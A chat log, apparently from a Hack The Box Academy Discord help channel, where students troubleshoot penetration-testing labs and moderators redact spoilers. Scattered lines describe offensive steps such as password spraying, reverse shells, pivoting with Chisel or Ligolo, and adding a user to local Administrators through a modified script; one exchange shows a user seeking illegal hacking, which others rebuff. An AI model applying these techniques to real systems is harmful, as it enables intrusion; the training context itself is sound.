I am not seeing flag.txt in there.... but I am seeing alot of .php files

#

But to make my own php file and maybe use a reverse-php exploit I need to login to the console...

cloud urchin
bitter dome
#

With that I was able to find the flag using msfconsole 🙌

#

Is that "spoiling" too much?

foggy monolith
cloud urchin
# foggy monolith Yes it is.

Deleted your post as it contained content from module above tier 0. That said, check your commands. You are missing at least one argument in one of your commands.

bitter dome
#

What did I say that was "spoiling" the module? So I can know in the future @cloud urchin @foggy monolith

cloud urchin
#

You didn't

bitter dome
#

Ok good to know.

quartz sundial
#

hello hello) I have same problem))

cloud urchin
fathom pendant
#

post request

foggy monolith
cloud urchin
#

I believe the module covers that

#

you likely want to force it to happen immediately instead of waiting

cloud urchin
#

it is quite a long time iirc 😛

#

or until reboot

storm elk
#

Okay, that’s too long indeed. Force ittttt (sorry, off-topic)

foggy monolith
cloud urchin
#

I could be remembering a different GPO attack. I think you just need to make sure you did all the steps correctly and it should work. I'm not seeing anything different than what they showed in the module in my notes.

foggy monolith
#

I ended up finding a different path to the same result anyway. Had to go the add-already-compromised-user-as-local-admin route and chain that with the fact that local admins can change passwords of other users by default.

cloud solstice
#

Hello, I am trying to solve the questions on https://academy.hackthebox.com/module/144/section/1257
I managed to run gobuster and get 4 subdomains: blog, admin, forum and support.
However, according to the question there should be one with "web" and one with "vm". And when I search this I see that people have more results than I do: https://forum.hackthebox.com/t/help-me-specialists-virtual-hosts-bruteforce/318049/22
Am I doing something wrong missing those records?

I changed my /etc/hosts file to have the "IP inlanefreight.htb" record, and this is the command I am running: gobuster vhost -u http://inlanefreight.htb:40525 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 10 --append-domain

nova knot
#

i'm unable to spawn a target!!! it jusy loads and then shows click here to spawn one

cloud urchin
nova knot
cloud urchin
#

how do you know when you didn't wait for it to spawn

nova knot
#

as i click on the spawn button

#

it loads up

cloud urchin
#

it can take 3-5 mins for an environment to fully spawn, you responded immediately

nova knot
#

then again shows click to spawn target

cloud urchin
#

try another browser

nova knot
#

Target(s): Click here to spawn the target system! --->> Target(s): Target(s) are spawning... --->Target(s): Click here to spawn the target system!

sturdy citrus
cloud urchin
#

try another region maybe

cloud urchin
#

@earnest anchor No. Not what this discord is about.

nova pivot
#

No target will spawn for me in the academy at the time of writing

digital pendant
#

are rdp sessions usually this unstable?

I'm getting DC'd every 15-20 second, on the Attacking Common Services module - section RDPf

[08:10:46:164] [55588:55589] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[08:10:46:164] [55588:55589] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[08:10:46:164] [55588:55589] [INFO][com.freerdp.client.common] - Network disconnect!

[08:11:04:337] [55614:55615] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[08:11:04:337] [55614:55615] [ERROR][com.freerdp.core] - failed to connect to 10.129.203.13

smoky arrow
#

hi guys, is it possibile to have help on an active machine or is it against the rules? I'm stuck since yesterday, I just need a hint on injecting a command using burp repeater ffor obtaining a shell

storm elk
#

if its one of the 2 recent boxes, they have a dedicated channel, otherwise #boxes 😄

smoky arrow
#

Sorry I dont use discord a lot I'm a little lost ahah, which is the dedicated channel? And the other thing u wrote I see "No access"

storm elk
#

Link your account via the instructions provided in #welcome

#

then you'll get access

#

Saw your shield and thought you had your account linked 🙂

smoky arrow
#

Thank u, yes now I see more channels

#

So I ask in boxes right?

storm elk
#

yes please

digital pendant
misty current
digital pendant
#

Yeah im on vpn else I wouldnt be able to get onto the target for 15s 😛

#

contacted support, pwnbox is doing it too

golden flower
#

Targets are not spawning for me as well. Quite a lot of problems lately.

#

Mhh I now changed to a different module and the targets are spawning. I was struggling with the pivoting module before.

digital pendant
fathom pendant
#

If you're having issues: reach out to support

#

Discord isn't an official mode of support

#

Bear in mind if it's a temp upstream issue, you may not be the only one reaching out

digital ore
#

Hey guys, anyone have troubleshooting problem using vpn file ?

#

I tried to switching between multiple servers but the result stay the same

rustic sage
#

its been few days

#

htb-student@nix03:~$ alright
alright: command not found
htb-student@nix03:~$ Read from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

i still get this error

#

whats up man

storm elk
#

contact support @rustic sage

compact patrolBOT
digital ore
#

ikr I just wonder if anyone have the same problem because I am not a newbie, I tried everything before asking actually.

storm elk
digital ore
arctic night
#

Are the machines in the "Attacking common services modules" working? Even nmap seems to not be working on the targets

digital pendant
edgy schooner
#

You ever get help with this? I am also stuck here...

edgy schooner
#

Nevermind. Hydra magically worked this morning. Probably operator error...

hard tree
#

Hi! I’m working on parameter fuzzing with GET requests. Can anyone help me understand why it might not be showing any results? Thank you very much!

fathom pendant
#
  1. why are you using powershell
  2. did the module give you a vhost/domain
hard tree
fathom pendant
hard tree
lime cosmos
#

how can i hide hints here so no one can see it ?

#

until u click on it

#

[hide] blabla [/hide]

echo roost
#

I'm currently working on "AD Enumeration & Attacks – Skills Assessment Part II." I've used Ligolo on the attack machine to forward traffic to my Kali machine, so I don't need to transfer tools directly. However, I'm having trouble getting any host on the internal network (172.16.7.x) to access my web server. This is preventing me from getting a Meterpreter shell and performing privilege escalation on SQL01.
The question I'm stuck on is:

"Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host."

I can log in to the SQL01 box with the credentials I found, but I need SYSTEM privileges to access the flag. I know the route and the PE method, but I just can't get the target to connect back to my machine.

Could outbound traffic be blocked by a firewall appliance? I looked at a walkthrough, and the author was able to use certutil and PowerShell to get a reverse shell via SOCKS after port forwarding with Chisel.

I find proxychains annoying and only use it when absolutely necessary—both in labs and at work.

#

Also, I when I RDP into the attack machine I can't connect a share when I use xfreerdp so I can use my own tools. It seems like outbound traffic is blocked on certain ports.

#

All inbound SMB, MSSQL and web from the attack machine to my kali machine works, However connecting a samba share from my kali machine to the attack machine doesn't work.

#

Can someone assist?

fathom pendant
echo roost
#

Outbout web from attack to kali works -

#

Ligolo works -

wicked nimbus
#

I am havin hard time in solving Question 4 and 5 from Information Gathering - Web Edition section . I have installed reconsipider and trying to get past this error but doesnt seem to work. Is anyone having a similar issue. This was not working and hence have tried finalrecon as well but it doesnt give me any answers to these questions. Can someone help me here please

lime cosmos
#

Ok so am in password attack - Hard lap ..
|| I crack the smb service with user given and I find the pas and login . After I find a username I try to do the same with mutated password list I did it for long time more then 30 min .. nothing found .. I am thinking to crack it with the rockyou.txt ? ||

arctic night
#

Is there a problem with the vpns? I downloaded several from different regions but it's still not working. Have to use Pwnbox for the moment

echo roost
#

So, here's a friendly FYI for students: If you're using port forwarding—regardless of the method—it seems that any outbound traffic from your attack box (Parrot, in my case) to your Kali machine (or whatever flavor of Linux you're using) may be blocked. It's likely due to a firewall appliance or AWS forwarding rules.

narrow mist
#

do you have some logs?

high crater
#

Hi

arctic night
narrow mist
echo roost
#

redownload the vpn package may help

arctic night
slim locust
#

can someone help me fo ra sec lol... IM doing a lab sim running hashcat and it tells me to run "passwords.txt" as my wordlist. Is that literally the file name or just a placeholder?

arctic night
slim locust
#

I feel really dumb for asking sorry

echo roost
echo roost
#

lol, sorry showing my age. my parents used to watch that dude

#

I got cha

heavy dome
thorny kraken
heavy dome
#

no

thorny kraken
echo roost
#

It's probably the Ace type from Powerview

fathom pendant
#

reminder not to reveal information from modules above tier 0

#

as it's considered a spoiler

heavy dome
#

sorry...

echo roost
#

Can we use spoiler tags?

fathom pendant
#

as anyone can still click on them

echo roost
fathom pendant
#

if you utilize spoiler tags, still redact information

fathom pendant
vast veldt
#

Fun fact:
If you include the php script of "module 160 - web services & API attacks - arbitrary file upload" into a code environment inside an obsidian note, then windows defender says weee wooo wee wooo and deletes the whole obsidian note. rip notes to api attacks KEKW_Salute (not that it were many)

fathom pendant
#

not to mention you can just as easily turn hiding spoiler tags off in your client settings

echo roost
#

I know, only kidding 😉

fathom pendant
#

that way defender doesn't even look at it

vast veldt
#

yes, just learned the hard way 🙂

echo roost
#

I haven't been on here in a while forgot about that. I deleted my posts for certain posts.

fathom pendant
#

because defender doesn't care if it's actively being used, just that it's valid code text that can be malicious

#

it doesn't really read the file extension

heavy dome
#

can anyone help me? What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) -- Active Directory Enumeration & Attacks

fathom pendant
arctic night
fathom pendant
#

also it's not a generic permission

fathom pendant
slim locust
#

I seem to not be able to run this command, says passwords.txt wordlist doesnt exist in this directory. I search the wordlists directory and can not find anything on this. Am I missing something lol

reef sonnet
#

anyone struggling with the case#7 flag in sqlmap module?

rustic sage
slim locust
#

but thank you!

fathom pendant
#

if you didn't already; check if the module has a resources button for you to download the wordlists from

slim locust
#

yeah I see nothing on that, but I just ran the command "locate passwords.txt" and there is no just "password.txt"

#

in the soc analyst path module Windows Attack & Defense

#

kerberoasting

fathom pendant
#

either that or the cheatsheet is being generic

#

such that you'd replace <passwords.txt> with a valid path to a password file

#

like rockyou.txt or something

slim locust
#

which shows that passwords.txt is an actual file I am assuming

#

sorry

fathom pendant
#

please don't share images from the walkthrough :)

slim locust
#

mb

fathom pendant
#

if they're referencing a passwords.txt file, then you likely were instructed to download/a link was given at some point

#

if it was a seclists password list they would have given you the full path

slim locust
#

yeah... uhhh... ill look some more..

fathom pendant
#

hey friend

#

click the hint button next to the question

#

:)

slim locust
#

omfg

#

why is that a freaking hint lol

#

im raging xd

fathom pendant
#

feel free to leave /feedback (and/or drop in #1234357888114364508 ) if you feel they need to make it clearer

fathom pendant
#

but as a general note: if no wordlist is provided or instructed to create, assume rockyou.txt

slim locust
#

thanks!

crystal stone
#

Hi, please help with Applications of AI in InfoSec assessment part , my code not give right result while upload 😦

bold wharf
#

ow

fathom pendant
#

do not share screenshots of modules above tier 0

bold wharf
#

sorry

fathom pendant
#

:)))

bold wharf
safe mango
fathom pendant
#

:)

bold wharf
fathom pendant
#

i suggest trying to complete the rest of the module blind; as AEN is completely doable without reading the module content or questions

tranquil topaz
#

@mortal basin ICS pentesting modules too please 😭

fathom pendant
#

get domain compromise then go back to answer the questions

south mulch
#

Hi, I need some help, stuck in module "Pentest in a Nutshell", section "Windows Privilege Escalation", I added the Add-LocalGroupMember -Group "Administrators" -Member "WIN01\john" string to the backupprep.ps1 script, I see *Administrators in Local Group Memberships for "net user john" but I still cannot access the Administrator folder, I get an error "Access Denied", but according to the module, I should be able to access it

fathom pendant
#

closing the RDP session is NOT logging out

south mulch
fathom pendant
south mulch
deep citrus
#

Hi all, does anyone have performance issues? I am running a redis-cli -h <target-ip> command and it's takinf me forever. Can anyone help?

crystal stone
muted thorn
#

Im currently starting out my HTB journey with Meow but it seems my Target isnt getting online because I cant even ping it let alone get my root flag

Anyone can help me out?

fathom pendant
compact patrolBOT
safe mango
#

You need to link your discord with your htb account

weak current
mighty valve
#

Hi guys, I am doing the pivoting and tunneling module and doing the SocksOverRDP section. Thing is once i have uploaded the socks over rpd and unzip it, before i can load the dll it just gets deleted after a few seconds??? has this happened to anyone else?

mighty valve
#

it looks like it’s already off?

cloud urchin
#

not off unless you turned it off

#

sounds like it's not if it's deleting the .dll file

plush zealot
#

hello

cloud urchin
mighty valve
ancient niche
#

Good evening guys someone hast completed the module AI?

ancient niche
#

skilss assessment

#

applications of AI in Infosec

fickle veldt
#

Hello can someone please help me with XSS module "phishing?" I have created a working XSS payload, verified the listening was workiing correctly but still when I paste it into the url to send to the victim I do not get any credentials

cold star
#

Hey, guys I am doing AD Enumeration & Attacks - Skills Assessment Part I the msfconsole has been stuck here for like 10minutes:

safe mango
safe mango
viral lotus
#

Hi I am on Windows Privilege escalation module - Skills Assessment - Part I. without giving too much away, I managed to get into the server and answer Q1, but when trying to priv esc for Q2 and beyond it was not working I tried Juicy P, but the nc wouldn't call back. my machine session ended but I was lost anyway. I have attached a screenshot whenever I tried in the directory with .\ it would just error but below just wouldn't catch anything I tried modifying my shell.exe a few times to see if that was the issue. a nudge would be appreciated, thanks.

safe mango
#

Are you supposed to listen to a port from your attacking machine?

cold star
#

Maybe it's a problem with the machine let me try launching it again

safe mango
cold star
cold star
safe mango
echo roost
#

Introduction to Windows Evasion Techniques - The VM's don't have Visual Studio? I can't find it installed.

fickle veldt
echo roost
#

You can't do any of the questions without a compiler installed. Visual Studio is not there nor is C:\tools

cold star
safe mango
cold star
safe mango
#

have you tried using the pwnbox instead of vpn?

cold star
safe mango
#

It is weekend bro, try some of that new stuff

cold star
#

no weekend for me my coaching is still on saturday and sunday sadglas

safe mango
#

lol

dapper moth
#

The target doesn’t

safe mango
#

let me know if it works, the pwnbox is really easy to use just make sure to use the clipboard icon when coping and pasting

safe mango
#

and try to ping the target first before starting the attack to make sure it is reachable

cold star
cold star
safe mango
cold star
safe mango
#

Is it possible for you to finish the challenge using the pwnbox?

cold star
#

anyways thanks man

safe mango
#

best of luck, keep it up man. It is those weekends that count

tardy inlet
#

Someone has German htb server?

safe mango
meager otter
#

Captive Portal - MAC Spoofing

I have done the airmon-ng command but when i do the airodump-ng command, I get no output. Would someone mind giving me a nudge with that one?

cold star
#

@safe mango got it to work just launched new machine in another module and then launched in my assesment it worked

wicked nimbus
cold star
golden snow
#

Guys, I don't understand this module Windows Event Logs & Finding Evil. is there a video explaining? what is written is so bad in this module make me confuse?

fast arrow
#

it's a lot easier to understand than some of the Microsoft documentation kek

safe mango
cunning berry
#

hey, on AD Enumeration & Attacks - Skills Assessment Part II question 4 , when looking at "show solution" it never explains why it used that password against the || kerbrute_windows passwordspray || i checked resources and that is just a list of tools. i am unclear as to how anyone would get that specific password, ending in a 1.

upper totem
#

I believe there might be a bug in Local File Inclusion as I am unable to do any of the exploits within the module and therefore cannot answer the questions

pure seal
# cunning berry hey, on AD Enumeration & Attacks - Skills Assessment Part II question 4 , when l...

that password is used in the earlier sections that explain and demonstrate password spraying, and it is introduced as a 'common password', probably because it meets the typical complexity requirements (8 characters, alphanumeric) and makes sense as a password set by an administrator for a new user

I guess they just expect you to use/repeat what was showed in these earlier sections for the skills assessment, because I don't think there is any other way you can obtain this password other than trying wordlists

cunning berry
safe star
safe star
#

i also suggest restarting the target

dapper moth
#

You will see throughout some of the modules these common passwords being attempted

#

Or a custom wordlist with some logical passwords for that target

shut wraith
#

Anyone know why the certify sliver command doesnt work ?

dreamy vigil
#

Hello

shut wraith
#

I know -- u find a more useful thing to do

dreamy vigil
#

What?

shut wraith
#

U just landed in the most pivotal place in ur life

#

U can now learn hacking if u want instead of wasting ur time capturing selfies

dreamy vigil
#

So?

shut wraith
#

Now its time to open the Domain Controllers account and make stacks hacking legally

dreamy vigil
#

Legally?

shut wraith
#

Unless u wanna live eating xanax instead of food and walking around with a hood on forever

dreamy vigil
#

With Fullz And Etc

#

Anybody ??

pure seal
#

Wrong type of server, read #rules no. 4

dreamy vigil
#

Shi

#

So What Is This Grohp

#

Group Abt

#

??

pure seal
dreamy vigil
#

So U Dont Know How To Hack?

safe star
shut wraith
#

Should I only use external binaries and proxies?

waxen totem
#

This is not that kind of server, we strive to be ETHICAL here. please stop asking

safe star
#

execute-assembly might be more consistent but its been a while

last ermine
#

Am i tripping, or in the Attacking SQL Databases module i have to alternate between 2 clients.
For example:
|| I have to use mssqlclient.py to send the hash, and then use sqlcmd to login with the mssqlsvc. Because i could not connect to my pwnbox share using sqlcmd, but i also cant log in as the svc account in mssqlclient.py. Not sure if this is normal and theres logic behind it but it messed with my brain for a bit||

waxen totem
last ermine
waxen totem
last ermine
#

yeah true

shut wraith
#

Any idea @safe star

#

Works with normal single un-encoded command

#
  • but doesnt work with base64 command which includes flags
#

I think im gonna give up on sharpsh

safe star
shut wraith
#

Thanks very much

dawn dust
#

im very frustrated with the ldap module asking how many users exist in the domain. Ive put every logical value in and it isnt working

#

Ive tried filtered by enabled, human names, permissions, etc the question just asks users and according to AD ive provided all "users"

shut wraith
#

and also u can use Get-WmiObject -Namespace "root\cimv2" -Class Win32_UserAccount

gritty python
#

Hi Guys, for the Advanced SQL Injection Skills Assessment I am struggling to generate right Reset Key (and to crack the password hash that I dumped), is there something that I am missing? Thank you in advance! 🙂

dawn dust
#

so i was trying the top one. it appears only the bottom one is correct

#

evidently aduser doesnt count 5 of the users

#

thank you very much

dawn dust
#

get-ADobject works for computer.count and group.count but not user.count

shut wraith
#

Any idea why sharpview doesnt work here


[*] sharpview output:
Parsing Error SPN: | is not a valid value for Boolean.
[Get-DomainSearcher] search base: LDAP://DC=child,DC=htb,DC=local
[Get-DomainUser] filter string: (&(samAccountType=805306368))
An error occurred: 'System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.DirectoryServices.DirectoryServicesCOMException: An operations error occurred.

   at System.DirectoryServices.DirectoryEntry.Bind(Boolean throwIfFail)
   at System.DirectoryServices.DirectoryEntry.Bind()
   at System.DirectoryServices.DirectoryEntry.get_AdsObject()
   at System.DirectoryServices.DirectorySearcher.FindAll(Boolean findMoreThanOne)
   at SharpView.PowerView.Get_DomainUser(Args_Get_DomainUser args)
   --- End of inner exception stack trace ---
   at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
   at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
   at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
   at SharpView.Program.Run(String[] args)
   at SharpView.Program.Main(String[] args)'```
frosty crescent
#

I'm almost done with bug bounty hunting, I must say the session security module is very underwhelming

#

Just spend a lot of time copy pasting payloads that aren't really explained, and the questions don't really ensure you understand anything

#

The rest of the course was much much better

shut wraith
frosty crescent
#

😂

shut wraith
#

7/10 of the commands used in the sliver module are outdated

#

But that being said I don't really need all 10

#

I have officially tried all of these commands to perform a simple sweep of kerberoastable SPNs and none of them worked (almost 15 methods)

#

Keep getting this error

safe star
#

it might just be that lab tbh, i think it was working somewhat on the skill assessment

knotty coral
#

Hi I am having issues with Linux privesc skills assesment - client_loop: send disconnect: Broken pipe on ssh just after few seconds of login.
Can someone help me with it or verify it are you facing this? Because its really annoying I have tried changing my vpn file , using pwnbox , stabilising the shell , getting a revshell from the ssh and changing internet but still its the same everytime.

gritty python
#

Hi Guys, for the Advanced SQL Injection Skills Assessment for the RCE Part I located the SQLi and I am able to perform SLEEP functions, etc. I was able to achieve RCE locally but it seems that in the lab user doesn't have the permission to use COPY Command. I tried using Large Object for the file upload but I wasn't able to do much that way either, is there something I am missing? Thank you! 🙂

novel valve
#

Hello Guys,
I'm now at the "Vulnerability Assessment" module and ask me whether Nessus scan will be come in the CPTS exam?

#

or is that just for the pentester job in future important

storm elk
uneven obsidian
#

hey, i just finished the Active Directory Enumeration & attacks module, is it recommended to do the the Active Directory Bloodhound module?

severe moss
#

Hey, im currently stuck in the statics detections part of the defender evasion because the flag is not appearing, any idea why or what to do? 🙂

"After placing the file, wait up to a minute; if all checks pass, the file "C:\Alpha\Static\flag.txt" will be created, containing the flag."

proud yacht
#

i can`t connect with user(sql_dev),

#

i can use htb-student, but if i use sql_dev, i can't connect

#

xfreerdp /v:<target ip> /u:sql_dev

safe mango
proud yacht
#

Windows Privilege Escalation

safe mango
proud yacht
#

I think that account doesn't have the necessary permissions.

leaden island
#

hlo their i hav a proplm

#

im on attacking common services hard lab

#

ive got 3 valid credentials

#

however i cant log in to RDP or RPC with any of them

#

so ive (like usual Kappa) run to a write up

#

the guy logged in to RDP with one of the users using rdesktop

cold star
leaden island
#

however xfreerdp and rdesktop both failed at me

#

xfreerdp produces some errors

#

and rdesktop freezes on black display

cold star
leaden island
#

though xfreerdp worked good befoere

#
└─$ xfreerdp /v:10.129.234.162 /u:J*** /p:'*************'                                                                             
[12:48:51:696] [156108:156109] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack pos
ition 0                                                                                                                                 
[12:48:51:696] [156108:156109] [WARN][com.freerdp.crypto] - CN = WIN-HARD                                                               
[12:48:53:704] [156108:156109] [ERROR][com.freerdp.core] - transport_ssl_cb:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_CERTAINLY_EXPI
RED [0x0002000F]                                                                                                                        
[12:48:53:704] [156108:156109] [ERROR][com.freerdp.core.transport] - BIO_read returned an error: error:0A000438:SSL routines::tlsv1 aler
t internal error                                                                                                                        

#

ah wait credentials exposed

cold star
cold star
# leaden island ah wait credentials exposed

Use xfreerdp to access the system via RDP. If you face black screen issues, use the following VPN fix:
sudo openvpn --config ~/Downloads/academy-regular.ovpn --mssfix 1200 --tun-mtu 1500
Now use:
xfreerdp3 /v:172.16.5.35 /u:mlefay /p:'Plain Human work!' /timeout:60000 /dynamic-resolution
🧠 Why this works:
The --mssfix 1200 and --tun-mtu 1500 prevent fragmentation of large packets over VPN, which is a common cause of black screens in RDP.

#

try this method

leaden island
#

black screen was on rdesktop

#

ill try tho

cold star
leaden island
#
└─$ xfreerdp /v:10.129.234.162 /u:f**** /p:'************'
[13:28:03:360] [160007:160008] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[13:28:03:360] [160007:160008] [WARN][com.freerdp.crypto] - CN = WIN-HARD
[13:28:12:381] [160007:160008] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[13:28:12:384] [160007:160007] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

#

same same

leaden island
#

theres a 3 here hmm

cold star
leaden island
#

theres an xfreerdp3 package tho i dont have it

#

does that proof its an error on my eend ?

#

also

#

what is this ip

#

its not for academy bruh

viral crag
#

Has anyone done the 2nd challenge of the Wi-Fi Evil Twin Attacks Skill Assessment?

I thought it had to be a collision event to disconnect the client from the WPA3 network and then Wifiphisher Plugin Update Phishing to trigger the reverse shell download and execution but it doesn't seem to work. Am I on the right track?

waxen totem
viral crag
# tribal plinth Yes you are

Any chance you can give me a little hint on what I'm doing wrong? I feel like I've tried every variation I can think of.

tribal plinth
viral crag
cold star
leaden island
#

I had to leave home

cold star
jaunty niche
#

I'm am unable to get any flag 🙂

cold star
fathom pendant
golden snow
#

hey guys, I'm in Skills Assessment for Windows Event Logs & Finding Evil, which i don't understand how to answer those question? I'm completely lost.

wooden seal
#

can someone help
module (Linux privesc > Container)
This command lxc exec {container} /bin/bash
gives -> Error: Command not found

fathom pendant
fathom pendant
wooden seal
fathom pendant
#

just being sure, because some people do forget

wooden seal
#

sorry if i sounded rude marcie

fathom pendant
#

i haven't touched that one in a minute but i don't recall needing to change too much from the reading

wooden seal
golden snow
wooden seal
fathom pendant
golden snow
#

what is ToS ?

fathom pendant
fathom pendant
#

Things you agree to when you create your account that 99% of people don't read

wooden seal
dark hedge
fathom pendant
golden snow
wooden seal
#

i thought it was i used diff. container name than image name lol

flint palm
#

Guys hello. In footprinting module in DNS section there is a subdomain.txt list where it can be found?

#

I was searching on SecLists but didn't find it

hidden urchin
#

In footprinting module DNS section i am on the last question What is the FQDN of the host where the last octet ends with "x.x.x.203"?

How to approach this questioh i have tried zone trasfer the inlanefreight.htb where i found app , dev , mail1 but now this seem end for me non of them are going further with zone transfer or dnsenum

flint palm
#

Did you download domain list?

hidden urchin
flint palm
#

subdomains.txt

#

subdomains-top1million-110000.txt

#

I downloaded this one but there also one needed it is called subdomains.txt and I can't find where it is located

hidden urchin
#

you will find all the list in this dir

leaden island
#

but the target is extremely slow

#

like its been on the same frame for a minute now

#

though pinging target is fine with ~500ms delay

cold star
cold star
leaden island
#

yes i got it from there

cold star
#

If it's not fixed still laggy then I have one more solution

leaden island
#

yeah still laggy

cold star
golden snow
# dark hedge recall how DLL hijacking works

I read again the section for the DLL Hijacking, still couldn't figure out how to find the _.exe file.
in the section: I created the DLL file using the Calc.exe. in the Skill Assessment I have to find it. i don't know which exe file created this DLL.
completely lost.

gritty python
#

Hi Guys, for the Advanced SQL Injection Skills Assessment for the RCE Part I located the SQLi and I am able to perform SLEEP functions, etc. I was able to achieve RCE locally but it seems that in the lab user doesn't have the permission to use COPY Command. I tried using Large Object for the file upload but I wasn't able to do much that way either, is there something I am missing? Thank you! 🙂

dark hedge
vernal tapir
#

hi, I'm on Exploiting Web vulnerabilities in Thick-Client Apps.

I've extracted and recompiled the fatty-client.jar, and logged in but following along the lesson I am not seeing an "open" button to read any of the notes in the application

(This is not the notes I need to be opening, trying not to leak anything)

leaden island
#

its a me problem then

#

sometimes a restart fixes it

ionic summit
#

is there a speaker / tts to modules yeeet

#

i would love to crochet while i go through the modules

cold star
leaden island
#

Which works well

#

Not sure whats wrong with my ubuntu

shut wraith
#

Sliver Module

Please look at the text file

  • I tried every enum method provided by sliver and 0 of them work to find SPNs
  • Rubeus also doesnt work neither can I use exteneral binaries to execute-assembyl
  • I think target host has something wrong with it
cold star
fathom pendant
#

@onyx plover this server isn't for tools like that. read #welcome and #rules

leaden island
#

Strange problem

#

I think i need to get used to pwnbox as a backup by the time cpts exam comes

ancient niche
#

ey guys I need some help with the last exercise of module AI

#

Good evening at the first place 😛

fading apex
#

Hola chicas y chicos

#

Acabo de llegar

#

Saludos

#

👍

analog plume
#

Hello everyone

#

Does anyone use a BCI? :3

fathom pendant
devout roost
#

Hello guys!

Is it possible to track a stolen MACBook if find my wasn't setup??

fading apex
#

Hi girls, how are you? Is the Espace two virtual machine good? I've already finished it. Regards.

#

Greetings

slate zinc
fathom pendant
devout roost
#

Oh, thanks @slate zinc !

I'm well aware, sorry if it sounded unprofessional!

Thinking of taking the CPTS soon as well!

I just went through apple support and they said it wasn't, so I thought maybe some our amazing guys might know how to do it even if it wasn't registered on FindMy!

Thanks for the response anyways!

slate zinc
#

nope we dont know how

#

and good luck on cpts

cloud urchin
#

@fading apex English only, please read the #rules.

quasi wave
#

hi for pivoting, tunneling, and port forwarding module's skill assessment section, I am trying to get nmap installed on the pivot host. I tried downloading the file from github, downloading the official tar file, and downloading the official deb file onto the attack box and sftping it onto pivot box. Problem is I'm not able to install it on pivot box.

#

this is for question 3. I need to see what IPs the pivot box is connected to

cloud urchin
#

it's not required to install nmap

quasi wave
#

do I not need nmap for this?

cloud urchin
#

nope

quasi wave
#

ok thanks

fathom pendant
#

@bitter dome your query had a lot of spoiler info

bitter dome
#

Hmm ok. most of the content was paths that did not work. How can I ask and not provide spoilers? I was trying to share what I have done so far.
I am open to feedback on how to restructure my query

fathom pendant
#

just being vague about finding things; i.e. i found a CVE that didn't work or something along those lines

bitter dome
#

I'm working through a Linux privilege escalation box and have gotten access as a limited user but need to elevate to root. I've looked into a few things like scheduled tasks and binaries with interesting permissions.
I also found a service version that matched a known CVE, but it didn’t lead anywhere useful after some testing.
Just wondering if anyone else ran into a similar roadblock or has any other nudges for me to figure out this box.
TYIA!

https://academy.hackthebox.com/module/77/section/844

north frigate
#

Cheers 🙂 As a beginner I managed SOME of the easier machines (with varying degrees of help) during season 7. With that I sort of got a grip of the basic "bulletpoint list" of what to do in which order (on a beginner-level). But for windows machines I sort of lack this understanding of the first steps. It feels like enumeration, foothold AND privesc do work completely different and (mostly) with different services (except DBs). Are windows machines more "complex" than linux ones? I dont find much on LDAP / Kerberos in the academy-basics EXCEPT in "active directory enum & attacks" module. Is this THE holy grail for most Windows machines?

quasi wave
#

I'm trying to make chisel work on the pivot host for question 3 for Pivoting, Tunneling, and Port Forwarding module's skill assessment. I got chisel tar onto machine and unzipped it but its not installing.

#

Makefile won't work I was gonna chatgpt it but

dark hedge
#

windows machines are just different from linux machines

quasi wave
#

I have tried several things I also tried using pivot box as proxy for nmap from local machine

#

what is the pattern here? what am I doing wrong with my thinking?

dark hedge
#

you don't have to build chisel from source

#

you can download precompiled binaries from github

quasi wave
#

ok thanks

#

I got chisel working it connected

#

now I'm trying to nmap from attack box

#

I'm hoping it works

fathom pendant
#

no CVEs required

quasi wave
#

ok do I not need to nmap from attack box?

#

I connected via chisel in order to nmap the internal network it isn't working

strange pivot
quasi wave
#

is this a troll I don't understand?

strange pivot
#

its a feature in ligolo that allows you to scan the localhost once your connected its not a troll, its a magic cidr 😄

quasi wave
#

well, I'll try it soon. someone else said they did ligolo for the whole module

#

I got chisel working but I'm trying to use chisel to nmap it from my own machine it still won't work

#

I can get a connection to the pivot host but I run nmap in proxychains and no matter if I use port 9050 or 1080 for SOCK5 proxy and no matter if I use port 1234 or 8080 on chisel server it just doesn't work. At best, I try the top 20 ports in nmap and they are all filtered

#

so its 64 hosts that are all filtered ports for every one of the top 20 most popular ports

#

what am I doing wrong here?

#

do I need to try without ARP?

#

do I need to ping the host because I don't think that will work in proxychains

#

I can't connect scan and I can't stealth or ping scan it in nmap with proxychains

#

what am I not getting here?

#

is anyone available for DM for this?

safe mango
#

Which module is this? Nmap?

#

@quasi wave

cold star
#

is there any way to make this faster here's the question: Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer.

cold star
cold star
quasi wave
safe mango
#

@cold star will help you out dm him

cold star
fathom pendant
#

Syn scans are a PITA

cold star
#

so by default it automatically starts with full 3 way handshake I didn't knew that

nova idol
#

Hey! I saw that HTB Academy recently released the "Android Application Static Analysis" and "Android Application Dynamic Analysis" modules. I’m really interested in diving into these, but I wanted to ask first — do the labs for these modules include a proper Android pentesting environment (e.g., emulators, APKs, or dynamic testing setups)? Just want to confirm if everything needed for hands-on practice is provided. Thanks in advance! 🙏

fathom pendant
shrewd sand
#

I'm working on the User and Group Management section of the Introduction to Windows Command Line (link: https://academy.hackthebox.com/module/167/section/1618) and I'm running into an error when you're required to run

Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online

